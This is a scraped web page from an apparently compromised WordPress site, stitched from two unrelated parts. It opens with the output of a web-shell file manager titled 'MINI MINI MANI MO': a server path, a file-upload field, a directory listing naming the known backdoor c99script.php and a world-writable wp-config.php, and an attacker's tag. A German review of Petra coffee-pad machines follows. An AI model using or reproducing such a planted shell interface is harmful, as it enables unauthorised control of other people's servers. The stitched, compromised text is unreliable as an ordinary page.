MINI MINI MANI MO

Path : /var/customers/webs/P0110/
File Upload :

Name
Size
Permission
Modify
test
--
drwxr-xr-x
webalizer
--
drwxr-xr-x
wp-admin
--
drwxr-xr-x
wp-content
--
drwxr-xr-x
wp-includes
--
drwxr-xr-x
.htaccess
0.474 KB
-rw-r--r--
c99script.php
32.019 KB
-rw-r--r--
googlef0e9d3a4f7394a4a.html
0.052 KB
-rw-r--r--
index.php
32.3 KB
-rw-r--r--
license.txt
19.468 KB
-rw-r--r--
liesmich.html
8.538 KB
-rw-r--r--
new_readme.php
7.017 KB
-rw-r--r--
readme.html
7.195 KB
-rw-r--r--
robots.txt
0.343 KB
-rw-r--r--
wp-activate.php
6.776 KB
-rw-r--r--
wp-blog-header.php
0.36 KB
-rw-r--r--
wp-comments-post.php
2.229 KB
-rw-r--r--
wp-config-sample.php
3.579 KB
-rw-r--r--
wp-config.php
4.205 KB
-rw-rw-rw-
wp-cron.php
3.862 KB
-rw-r--r--
wp-links-opml.php
2.445 KB
-rw-r--r--
wp-load.php
3.248 KB
-rw-r--r--
wp-login.php
46.481 KB
-rw-r--r--
wp-mail.php
8.284 KB
-rw-r--r--
wp-settings.php
18.672 KB
-rw-r--r--
wp-signup.php
30.383 KB
-rw-r--r--
wp-trackback.php
4.652 KB
-rw-r--r--
xmlrpc.php
3.076 KB
-rw-r--r--

OHA YOOOO
Petra Kaffeepadmaschinen » Kaffeepadmaschine.info

Petra Kaffeepadmaschinen

Petra Kaffeepadmaschinen

Dass die Petra Kaffeepadmaschinen in technischer Hinsicht sehr den WMF Maschinen ähneln, hat den Grund, dass die Firma Petra bis zum Jahre 2013 zu dem württembergischen Unternehmen gehörte. Petra Kaffeepadmaschinen werden, so scheint es, im Gegensatz zu den WMF Maschinen weiter entwickelt und haben sich, am Markt etabliert ohne allerdings den Platzhirschen Philips ernsthaft zu gefährden.

Die Petra Kaffeepadmaschinen waren zunächst eher im niedrigeren Preissegment zu finden, ließen sie doch auch sowohl in der Optik als auch in der Haptik eine gewisse Wertigkeit, die sowohl WMF als auch die Senseos boten, vermissen. Doch mit der Petra Electric KM 42.17 Kaffeepadmaschine Artenso latte ist ihnen ein großer Coup gelungen bietet sie doch bei einem deutlich niedrigerem Preis mehr Features als die Senseo Quadrante latte duo, bietet allerdings nach mehreren Kundenrezensionen auch einige Langzeitschwächen. Gleichzeitig aber gibt es Nutzer, die die Petra Electric KM 42.17 Kaffeepadmaschine Artenso latte schon länger im intensiven Betrieb haben und durchaus angetan sind.

Petra Kaffeepadmaschinen im Überblick:

Der Petra Electric KM 34.07 Kaffee-Pad-Automat hingegen, der momentan als günstigste Padmaschine auf dem Markt zu finden ist, kommt bei Käufern scheinbar weniger gut an. Glaubt man Testberichten verliert sie Wasser und dies nicht nur, wenn man den Drehknopf nicht über das Symbol dreht sondern auch aus anderen Öffnungen. Näheres dazu lesen sie in diversen Testberichten zur Petra Electric KM 34.07.

Es ging der WMF, die ja die Petra Kaffeepadmaschinen im Jahr 2006, nachdem das Patent von Philips für Padmaschinen widerrufen wurde, scheinbar um jeden Preis darum, schnell eine günstige Alternative zu den Senseo auf dem Markt zu positionieren. Leider ließen sie dabei aber eine gewisse Wertigkeit vermissen, so dass es besonders während der ersten Jahre zu vielen Reklamationen kam.

Wir vermuten, dass es für Nutzer von Vorteil ist, dass die Petra Kaffeepadmaschinen nun in anderer Hand sind und erwarten für die Zukunft weitere marktfähigere Maschinen, die auch Philips dazu bringen, nicht nur an Innovationen sondern auch am Preis etwas zu verändern.
Es wäre zum Beispiel wünschenswert, wenn auch die günstigeren Einstiegsmaschinen wie bei den Petra Kaffeepadmaschinen über einen separaten Heißwasser-Auslauf verfügen, um schnell und einfach einen Tee zuzubereiten.

Abschließend kann gesagt werden, dass die Padmaschinen der Marke Petra, besonders mit der
Petra Electric KM 42.17 Artenso latte einen deutlichen Schritt in die richtige Richtung gemacht haben. Wir erachten Produkte dieses Herstellers daher als durchaus empfehlenswert. Hoffen wir, dass es auch wirtschaftlich erfolgreich wird, damit weitere alternative Kaffeepadmaschinen in den Handel kommen, die den Marktführer Philips beindrucken. Nur durch einen starken Mitbewerber müssen sich auch die (eigentlich unangefochtenen) Platzhirsche anstrengen. Wie heißt es doch so schön: Konkurrenz belebt das Geschäft. Auch bei Kaffeepadmaschinen.